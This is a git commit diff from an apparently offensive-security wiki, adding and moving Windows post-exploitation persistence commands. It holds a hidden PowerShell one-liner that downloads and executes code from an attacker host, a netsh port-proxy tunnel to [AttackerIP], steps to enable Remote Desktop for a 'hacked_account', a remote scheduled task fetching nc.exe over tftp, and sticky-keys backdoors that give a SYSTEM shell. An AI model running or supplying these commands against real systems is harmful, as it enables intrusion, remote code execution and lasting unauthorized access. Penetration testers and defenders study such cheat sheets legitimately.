weyne/pwnwiki.github.io
1
0
Fork 0
mirror of https://github.com/oXis/pwnwiki.github.io.git synced 2025-10-29 16:56:59 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #80 from pwnwiki/netsh

Browse Source 
Moved netsh cmd to proper place.
This commit is contained in:
WebBreacher 2014-03-30 19:56:48 -04:00
commit cd315f9c18
2 changed files with 107 additions and 61 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

51
persistence/windows/general.md
View File

@ -19,6 +19,10 @@ When you modify a system to talk on the network, you may need to alter the Windo
`netsh firewall set service type = remotedesktop mode = enable` `netsh firewall set service type = remotedesktop mode = enable`
### Tunnel Traffic Natively with Windows
`netsh int portproxy v4tov4 listenport=80 connecthost=[AttackerIP] connectport=80`
### Powershell Downloader ### Powershell Downloader
* **Command with arguments**: `powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))"` * **Command with arguments**: `powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))"`
* **Description**: According to [posted slides](http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607), _"Schedule this and it will execute the shellcode on that page, pulling it each time (so you can change as needed)"_. * **Description**: According to [posted slides](http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607), _"Schedule this and it will execute the shellcode on that page, pulling it each time (so you can change as needed)"_.
@ -39,6 +43,7 @@ Remote Desktop allows a remote user to receive a graphical "desktop" of the targ
1. On the compromised system, create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system. 1. On the compromised system, create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system.
<pre> <pre>
[Unicode] [Unicode]
Unicode=yes Unicode=yes
@ -55,48 +60,94 @@ Remote Desktop allows a remote user to receive a graphical "desktop" of the targ
1. Create another file named `enable_ts.reg` containing the contents below. 1. Create another file named `enable_ts.reg` containing the contents below.
<pre> <pre>
Windows Registry Editor Version 5.00 Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000 "fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001 "TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000 "TSUserEnabled"=dword:00000000
</pre> </pre>
1. On the remote system, execute the following commands: 1. On the remote system, execute the following commands:
<pre>c:\> sc config termservice start= auto sc config termservice start= auto <pre>c:\> sc config termservice start= auto sc config termservice start= auto
c:\> regedit /s enable_ts.reg c:\> regedit /s enable_ts.reg
c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
c:\> gpupdate /Force c:\> gpupdate /Force
c:\> net start "terminal services" c:\> net start "terminal services"
</pre> </pre>
### Scheduler ### Scheduler
The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. It usually runs at the SYSTEM account privilege level. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below. The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. It usually runs at the SYSTEM account privilege level. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
<pre> <pre>
c:\> net use \\[TargetIP]\ipc$ password /user:username c:\> net use \\[TargetIP]\ipc$ password /user:username
c:\> at \\[TargetIP] 12:00 pm command c:\> at \\[TargetIP] 12:00 pm command
</pre> </pre>
An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe` An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe`
### Sticky Keys (Requires reboot) ### Sticky Keys (Requires reboot)
Sticky keys on Windows systems are activated when the user presses the SHIFT key 5 times. Here, according to the [posted slides](http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607), you replace the sethc.exe binary with your own binary (cmd.exe maybe?) and, when SHIFT is pressed 5 times, your binary is executed. Your binary will execute as SYSTEM and needs to replace the `%WINDIR%\System32\sethc.exe`. Sticky keys on Windows systems are activated when the user presses the SHIFT key 5 times. Here, according to the [posted slides](http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607), you replace the sethc.exe binary with your own binary (cmd.exe maybe?) and, when SHIFT is pressed 5 times, your binary is executed. Your binary will execute as SYSTEM and needs to replace the `%WINDIR%\System32\sethc.exe`.
Some caveats: Some caveats:
* If NLA (Network Layer Authentication) is enabled, this won't work * If NLA (Network Layer Authentication) is enabled, this won't work
* If RDP (Remote Desktop Protocol) is disabled, this won't work * If RDP (Remote Desktop Protocol) is disabled, this won't work
### Sticky Keys (No reboot) ### Sticky Keys (No reboot)
This technique uses registry entries to switch the binary that the sticky keys executes. Its real advantage is that it does not require a reboot for the switch to take place. This technique uses registry entries to switch the binary that the sticky keys executes. Its real advantage is that it does not require a reboot for the switch to take place.
* In the `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options` make a key called `sethc.exe` * In the `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options` make a key called `sethc.exe`
* Make a REG_SZ value called "Debugger" (Ensure it is capitalized) * Make a REG_SZ value called "Debugger" (Ensure it is capitalized)
* For the "Debugger" REG_SZ, make it have a value of your binary * For the "Debugger" REG_SZ, make it have a value of your binary
* Press SHIFT 5 times and your binary should be executed * Press SHIFT 5 times and your binary should be executed

5
scripting/windows.md
View File

@ -2,11 +2,6 @@
One liners One liners
----------- -----------
**Tunnel traffic natively with windows**
```bash
netsh int portproxy v4tov4 listenport=80 connecthost=10.0.0.1 connectport=80
```
**Launch cmd.exe as local system w/ psexec** **Launch cmd.exe as local system w/ psexec**
```bash ```bash
psexec -s cmd.exe psexec -s cmd.exe